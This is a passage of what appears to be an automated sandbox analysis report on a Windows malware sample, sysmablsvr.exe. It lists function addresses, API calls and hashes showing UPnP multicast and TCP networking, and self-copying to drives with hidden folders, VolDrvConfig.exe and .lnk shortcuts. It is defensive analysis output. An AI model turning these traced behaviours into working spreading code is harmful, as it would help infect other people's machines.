                                                • Part of subcall function 00407250: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
                                              • SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFreeInstanceString
                                              • String ID: Microsoft Corporation
                                              • API String ID: 586785272-3838278685
                                              • Opcode ID: 47348544a12607a113ad889ec3bd29dddf14831e53aa8f734b6601f1a55deb08
                                              • Instruction ID: e6ff3ca51e6e637cb53d631dd4329f9e07d4b07e7a8aed38044ad589faa32fb5
                                              • Opcode Fuzzy Hash: 47348544a12607a113ad889ec3bd29dddf14831e53aa8f734b6601f1a55deb08
                                              • Instruction Fuzzy Hash: 0F91EC75A0410ADFCB04DF98C894AAFB3B5BF89304F208169E515BB3E0D774AD41CBA6
                                              APIs
                                              • CoInitializeEx.COMBASE(00000000,00000002,?,?,?,00407FB2), ref: 0040DBDA
                                                • Part of subcall function 0040DCA0: socket.WS2_32(00000002,00000002,00000011), ref: 0040DCBA
                                                • Part of subcall function 0040DCA0: htons.WS2_32(0000076C), ref: 0040DCF0
                                                • Part of subcall function 0040DCA0: inet_addr.WS2_32(239.255.255.250), ref: 0040DCFF
                                                • Part of subcall function 0040DCA0: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DD1D
                                                • Part of subcall function 0040DCA0: bind.WS2_32(000000FF,?,00000010), ref: 0040DD53
                                                • Part of subcall function 0040DCA0: lstrlenA.KERNEL32(00411D70,00000000,?,00000010), ref: 0040DD6C
                                                • Part of subcall function 0040DCA0: sendto.WS2_32(000000FF,00411D70,00000000), ref: 0040DD7B
                                                • Part of subcall function 0040DCA0: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DD95
                                                • Part of subcall function 0040DF10: SysFreeString.OLEAUT32(00000000), ref: 0040DFEB
                                                • Part of subcall function 0040DF10: SysFreeString.OLEAUT32(00000000), ref: 0040DFF5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                              • String ID: TCP$UDP
                                              • API String ID: 1519345861-1097902612
                                              • Opcode ID: eec8d27479aca65ce9d536c40e716b47b94f3bf0f210a133f1cac4c1684116a5
                                              • Instruction ID: a00cbb5bcfca6c5959655f637b3ec774768ac2685424fa301eff230043eb3e38
                                              • Opcode Fuzzy Hash: eec8d27479aca65ce9d536c40e716b47b94f3bf0f210a133f1cac4c1684116a5
                                              • Instruction Fuzzy Hash: A011B4B4D04208EBEB00EBD4DD85FAE7774EB44308F14886EE511772C2D6B86A54DB59
                                              APIs
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D06C
                                              • InterlockedIncrement.KERNEL32(000000FF), ref: 0040D0A1
                                              • InterlockedDecrement.KERNEL32(000000FF), ref: 0040D1A4
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked$DecrementExchangeIncrement
                                              • String ID:
                                              • API String ID: 2813130747-0
                                              • Opcode ID: 10f46782638f7eda3a214a1f10b58e6aed05a65f91f94cb894a7507c1a205cdc
                                              • Instruction ID: 017c2f15931ef08fbe7839c337ff8a6f36f60e541ef5a040d0e28dc2d006860e
                                              • Opcode Fuzzy Hash: 10f46782638f7eda3a214a1f10b58e6aed05a65f91f94cb894a7507c1a205cdc
                                              • Instruction Fuzzy Hash: 0F41C4B5E00204BBDB00EAE4DC45BAFB774AF44304F14856DF5057B2C2EA39E549C7AA
                                              APIs
                                              • lstrlenA.KERNEL32(Twizt,0040D0C6,0040D0C6,?,?,0040D0C6,000000FF,0040D0C6,0040D0C6,000000FF,00000000), ref: 0040BA5C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrlen
                                              • String ID: Twizt$Twizt
                                              • API String ID: 1659193697-16428492
                                              • Opcode ID: fa8edf28750f8027af871247a63973c4b41ab5b5d4de526fdf23350eaac8532b
                                              • Instruction ID: 4e54a8859baccdb28b1a2df46ebdf2c08f14bf9243dcc10692db5268a496b862
                                              • Opcode Fuzzy Hash: fa8edf28750f8027af871247a63973c4b41ab5b5d4de526fdf23350eaac8532b
                                              • Instruction Fuzzy Hash: 0E111FB5900108BFCB04DF98D845E9EB7B5EF48304F14C1A9FD19AB342D635EA51CBA6
                                              APIs
                                              • socket.WS2_32(00000002,00000001,00000006), ref: 0040D363
                                              • htons.WS2_32(00009E34), ref: 0040D395
                                              • connect.WS2_32(000000FF,?,00000010), ref: 0040D3AF
                                                • Part of subcall function 0040B0D0: shutdown.WS2_32(0040B0BD,00000002), ref: 0040B0D9
                                                • Part of subcall function 0040B0D0: closesocket.WS2_32(0040B0BD), ref: 0040B0E3
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: closesocketconnecthtonsshutdownsocket
                                              • String ID:
                                              • API String ID: 1987800339-0
                                              • Opcode ID: ad00b5e66e502cf51556e2fe0723fe5a46734f1a748e3451fb2f35000b259efe
                                              • Instruction ID: ee266e0a8c8719bc2fba7400efab20befeff5f99746ae5463c0b1e7a65fd0daa
                                              • Opcode Fuzzy Hash: ad00b5e66e502cf51556e2fe0723fe5a46734f1a748e3451fb2f35000b259efe
                                              • Instruction Fuzzy Hash: 72115E74D15209EBCB10DFE4D9096AEB770AF08320F2042A9E825A73D0E7744F04D75A
                                              APIs
                                                • Part of subcall function 0040A3E0: GetCurrentProcessId.KERNEL32(?,0040A34B,?,0040CC5E,00000010,?,?,?,?,?,?,0040C9CB), ref: 0040A3E3
                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,0040A357,?,0040CC5E,00000010,?,?,?,?,?,?,0040C9CB), ref: 0040A42C
                                              • HeapSetInformation.KERNEL32(00520000,00000000,00000002,00000004), ref: 0040A456
                                              • GetCurrentProcessId.KERNEL32 ref: 0040A45C
                                                • Part of subcall function 0040A470: GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A48C
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CurrentHeap$CreateHeapsInformation
                                              • String ID:
                                              • API String ID: 3179415709-0
                                              • Opcode ID: 5a108914b3ca16dd467672ecd1f535595cbdc9e5ef981947958d13e496554fa7
                                              • Instruction ID: edbbffaf93a3436984b23127d7402b1a87aa4c07fde6db6b10934f01e370cb92
                                              • Opcode Fuzzy Hash: 5a108914b3ca16dd467672ecd1f535595cbdc9e5ef981947958d13e496554fa7
                                              • Instruction Fuzzy Hash: AFF0B4B4594304ABD324EB61FD49FA73674A704309F10C03AF6059A2D0EAB99854CBAE
                                              APIs
                                              • CreateFileW.KERNEL32(00406B80,80000000,00000001,00000000,00000003,00000000,00000000,00406B80), ref: 0040ED20
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040ED35
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040ED42
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleSize
                                              • String ID:
                                              • API String ID: 1378416451-0
                                              • Opcode ID: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
                                              • Instruction ID: 98ef07a2b566d3243162703a825906d5a5daebce6a0da163f7da7fd81d96dea2
                                              • Opcode Fuzzy Hash: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
                                              • Instruction Fuzzy Hash: 59F01C78A40308FBDB20DFA4DC49B8DBBB4EB04701F208295FA04BB2D0D6B56A908B44
                                              APIs
                                                • Part of subcall function 0040A3E0: GetCurrentProcessId.KERNEL32(?,0040A34B,?,0040CC5E,00000010,?,?,?,?,?,?,0040C9CB), ref: 0040A3E3
                                              • RtlAllocateHeap.NTDLL(00520000,?,-0000000C), ref: 0040A38A
                                              • memset.NTDLL ref: 0040A3C4
                                                • Part of subcall function 0040A400: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,0040A357,?,0040CC5E,00000010,?,?,?,?,?,?,0040C9CB), ref: 0040A42C
                                                • Part of subcall function 0040A400: HeapSetInformation.KERNEL32(00520000,00000000,00000002,00000004), ref: 0040A456
                                                • Part of subcall function 0040A400: GetCurrentProcessId.KERNEL32 ref: 0040A45C
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
                                              • String ID:
                                              • API String ID: 3494217179-0
                                              • Opcode ID: ff151d06aee4f1c47090b8446ec3a31afed0510a3b2c283af0ac3e03788a053e
                                              • Instruction ID: dafe32efe4c167221a9f0a0fcc4700d2ff8859eb3bfe14518bdee6820b90f2e1
                                              • Opcode Fuzzy Hash: ff151d06aee4f1c47090b8446ec3a31afed0510a3b2c283af0ac3e03788a053e
                                              • Instruction Fuzzy Hash: DB111675D00208BBCB14DFA5DC45F9E7BB4AF44308F14C169F908A7381D6799A64CB99
                                              APIs
                                                • Part of subcall function 004013B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DAED,00000000), ref: 004013D5
                                                • Part of subcall function 004013B0: socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                • Part of subcall function 004013B0: bind.WS2_32(?,?,00000010), ref: 00401429
                                                • Part of subcall function 0040B790: EnterCriticalSection.KERNEL32(00417F40,?,?,0040D449), ref: 0040B7A0
                                                • Part of subcall function 0040B790: LeaveCriticalSection.KERNEL32(00417F40,?,?,0040D449), ref: 0040B7CC
                                              • InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040DB0D
                                              • WaitForSingleObject.KERNEL32(00000608,00001388), ref: 0040DB57
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
                                              • String ID:
                                              • API String ID: 3920643007-0
                                              • Opcode ID: b555294288812e662926245c1619bb05553a75d869341bdbd32587f084eee9a0
                                              • Instruction ID: 039b22cfc999328ab4dd85ecb07c912dee675a849c6b051bf2d5b72f10c66e02
                                              • Opcode Fuzzy Hash: b555294288812e662926245c1619bb05553a75d869341bdbd32587f084eee9a0
                                              • Instruction Fuzzy Hash: BF11C8B4E00208ABE704EBD4DC46FAF7775EB44700F10857AF601772D1E675AA40CB98
                                              APIs
                                              • gethostname.WS2_32(?,00000100), ref: 0040B37C
                                              • gethostbyname.WS2_32(?), ref: 0040B38E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: gethostbynamegethostname
                                              • String ID:
                                              • API String ID: 3961807697-0
                                              • Opcode ID: aaec8b9e3ccfd23335778a95738de583a013869622460b5e30cdc36053fb7845
                                              • Instruction ID: 44deb7cf52290b4586819f8899dd9153b2a8efa645923fb411959763281ab54e
                                              • Opcode Fuzzy Hash: aaec8b9e3ccfd23335778a95738de583a013869622460b5e30cdc36053fb7845
                                              • Instruction Fuzzy Hash: 63113034908158CBCB24CF14C844BD9B771EB65314F2482DAD89967390C7F9ADC1CF89
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: gethostbynameinet_addr
                                              • String ID:
                                              • API String ID: 1594361348-0
                                              • Opcode ID: c33f327bb9ec7267db1a3eace16e79cfc334ac04858cae8989207d18368f1188
                                              • Instruction ID: c30d1111fa8aec0d0243eb44b2ea1b203e3c6e8c9f62e428f3e96346a60b5274
                                              • Opcode Fuzzy Hash: c33f327bb9ec7267db1a3eace16e79cfc334ac04858cae8989207d18368f1188
                                              • Instruction Fuzzy Hash: B2F01C38900608EFCB00DFB8D44889DBBB4EB48315F2083AAE915673A0D7319E80DB84
                                              APIs
                                              • WaitForSingleObject.KERNEL32(00000608,000003E8), ref: 0040B9BE
                                              • InterlockedDecrement.KERNEL32(00416900), ref: 0040B9D0
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DecrementInterlockedObjectSingleWait
                                              • String ID:
                                              • API String ID: 4086267124-0
                                              • Opcode ID: 1e970852be599c696d547c929423b331989f4975ea251fc7d2b6c9e08e4946df
                                              • Instruction ID: a233c83ca34354034971c23090ee6659476326473442f5acee26e7234e36c9e2
                                              • Opcode Fuzzy Hash: 1e970852be599c696d547c929423b331989f4975ea251fc7d2b6c9e08e4946df
                                              • Instruction Fuzzy Hash: B3D0A7B060820897D6006BA2BC4AFAF361DF710700F208037F211F12C1DBBCC88087AD
                                              APIs
                                              • shutdown.WS2_32(0040B0BD,00000002), ref: 0040B0D9
                                              • closesocket.WS2_32(0040B0BD), ref: 0040B0E3
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: closesocketshutdown
                                              • String ID:
                                              • API String ID: 572888783-0
                                              • Opcode ID: bfbd7c6bd4046a28b837c812f6aa1fd48043d02f9901879055b44668827d2eb5
                                              • Instruction ID: 69ce69260fc8840876d91afc79957fad69f2a54b7a8d7d483856da217b0a501e
                                              • Opcode Fuzzy Hash: bfbd7c6bd4046a28b837c812f6aa1fd48043d02f9901879055b44668827d2eb5
                                              • Instruction Fuzzy Hash: 04C04C7914120CBBCB049FE5ED4DDD97B6CEB4C651F008494FA098B251CBB6E980CB95
                                              APIs
                                              • EnterCriticalSection.KERNEL32(00417F40,?,?,0040D449), ref: 0040B7A0
                                              • LeaveCriticalSection.KERNEL32(00417F40,?,?,0040D449), ref: 0040B7CC
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave
                                              • String ID:
                                              • API String ID: 3168844106-0
                                              • Opcode ID: ebaff0e38dce2bcdecab070fba5d988b16e224b8acbc950c5cf15e01cb1945e0
                                              • Instruction ID: 82a24cfc49daa4dd113d85e03683bf8b847197676c2f08b7574fbd4a9c2e3740
                                              • Opcode Fuzzy Hash: ebaff0e38dce2bcdecab070fba5d988b16e224b8acbc950c5cf15e01cb1945e0
                                              • Instruction Fuzzy Hash: 9AE01AB4988248EBC704DB84EC4AB9A77B4E704304F2040A9F40953394DBB96E81CA5D
                                              APIs
                                              • EnterCriticalSection.KERNEL32(00417F40,?,0040B987), ref: 0040B0F8
                                              • LeaveCriticalSection.KERNEL32(00417F40,?,0040B987), ref: 0040B108
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave
                                              • String ID:
                                              • API String ID: 3168844106-0
                                              • Opcode ID: 16df506433d4e8c83b69bad2d7f7829224e80cd3d713427d489287ebbef4d618
                                              • Instruction ID: 2ed2b46888fb6f3b201c7a13b640640739f036443c4b3c2ece1b6af5f7013754
                                              • Opcode Fuzzy Hash: 16df506433d4e8c83b69bad2d7f7829224e80cd3d713427d489287ebbef4d618
                                              • Instruction Fuzzy Hash: F9B092301C8218B7810077A2EC0FECA3A28E954B55B1054F2F04A501AA8FEF24D145AE
                                              APIs
                                              • send.WS2_32(00000000,00000000,?,00000000), ref: 0040D23F
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: send
                                              • String ID:
                                              • API String ID: 2809346765-0
                                              • Opcode ID: cda5f312f6eda810f0f95d257092257d7ce247fca3496cef4d7c6d61fe650e3b
                                              • Instruction ID: b933cb730c7ceaad0b52d00299a3dfb9d1991716126677b818ce35410280706b
                                              • Opcode Fuzzy Hash: cda5f312f6eda810f0f95d257092257d7ce247fca3496cef4d7c6d61fe650e3b
                                              • Instruction Fuzzy Hash: 7901197490834DEFCB00CFA8C884B9E7BB4BB09314F1081A9E815A7381C3759699CB55
                                              APIs
                                                • Part of subcall function 0040B790: EnterCriticalSection.KERNEL32(00417F40,?,?,0040D449), ref: 0040B7A0
                                                • Part of subcall function 0040B790: LeaveCriticalSection.KERNEL32(00417F40,?,?,0040D449), ref: 0040B7CC
                                              • WaitForSingleObject.KERNEL32(00000608,00001388), ref: 0040D46C
                                                • Part of subcall function 0040D060: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D06C
                                              • API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
                                              • String ID:
                                              • API String ID: 3309573332-0
                                              • Opcode ID: b712a9e22ef945fa05c7c249d3f1ce022d4de63074206965558eacae03614f8f
                                              • Instruction ID: a2076b206fb369904fcfb2d1b6828b0d7e28f4f1bfe29f0599cec3c384bc1ad4
                                              • Instruction Fuzzy Hash: F4E09270E0020CA6D714A7E19C06B6E726A9750305F24847EF501772C1DA79A94487AD
                                              APIs
                                              • CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
                                              • API ID: CreateInstance
                                              • String ID:
                                              • API String ID: 542301482-0
                                              • Opcode ID: c09f913f08406f093c7ac86b5101c5a128e05d7496c9f4ec9220068c62795e96
                                              • Instruction ID: d63025b72d2c6ebaad53fa266f334e56fbfbf26be99018a77b0022b5cf711e38
                                              • Instruction Fuzzy Hash: 5FE0C97490120CBFDB40DF90C889B9EBBB8AB08315F1081A9E90467280D7B96A948BA5
                                              APIs
                                                • Part of subcall function 004062C0: GetDriveTypeW.KERNEL32(0040629F), ref: 004062CD
                                              • lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 004062B3
                                              • API ID: DriveTypelstrcpy
                                              • String ID:
                                              • API String ID: 3664088370-0
                                              • Opcode ID: aa744ef504167f27be6d486533275d748dec175d232d96b41b3e61fed09f16a0
                                              • Instruction ID: a3f39d1a22dcf836f44b0fbcddd46cfc88cbb50e51ff9e9dfde0dd7881e74902
                                              • Instruction Fuzzy Hash: DCF04975D00208EBCB00EFA4D44579EB7B4EF04304F00C0ADE815AB240E639AB58CB49
                                              APIs
                                              • _chkstk.NTDLL(?,00406CC0,?,?,?), ref: 00406658
                                              • wsprintfW.USER32 ref: 0040668F
                                              • wsprintfW.USER32 ref: 004066AF
                                              • wsprintfW.USER32 ref: 004066CF
                                              • wsprintfW.USER32 ref: 004066EF
                                              • wsprintfW.USER32 ref: 00406708
                                              • PathFileExistsW.SHLWAPI(?), ref: 00406718
                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
                                              • DeleteFileW.KERNEL32(?), ref: 0040675E
                                              • PathFileExistsW.SHLWAPI(?), ref: 0040676B
                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406785
                                              • DeleteFileW.KERNEL32(?), ref: 00406792
                                              • PathFileExistsW.SHLWAPI(?), ref: 0040679F
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 004067B2
                                              • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067C5
                                              • PathFileExistsW.SHLWAPI(?), ref: 004067D2
                                              • CopyFileW.KERNEL32(C:\Windows\sysmablsvr.exe,?,00000000), ref: 004067EA
                                              • API ID: File$wsprintf$ExistsPath$Attributes$Delete$CopyCreateDirectory_chkstk
                                              • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDrvConfig.exe$%s\*$C:\Windows\sysmablsvr.exe$shell32.dll$shell32.dll
                                              • API String ID: 2120662298-1321675690
                                              • Opcode ID: db5eccb7a8f15aa8004616f5cf87b59d8a7d315b42364bc1ec8f026dd92e313a
                                              • Instruction ID: c06ff6b6fb177b83c5a42a6bb152b383d4bd735e421ae8a12f9cadfa06fd6cc4
                                              • Instruction Fuzzy Hash: A8D164B5900258ABCB20DF50DC54FEA77B8BB48304F04C5EAF20AA6191D7B99BD4CF59
                                              APIs
                                              • CreateDirectoryW.KERNEL32(00406AFE,00000000), ref: 0040651F
                                              • wsprintfW.USER32 ref: 00406535
                                              • FindFirstFileW.KERNEL32(?,?), ref: 0040654C
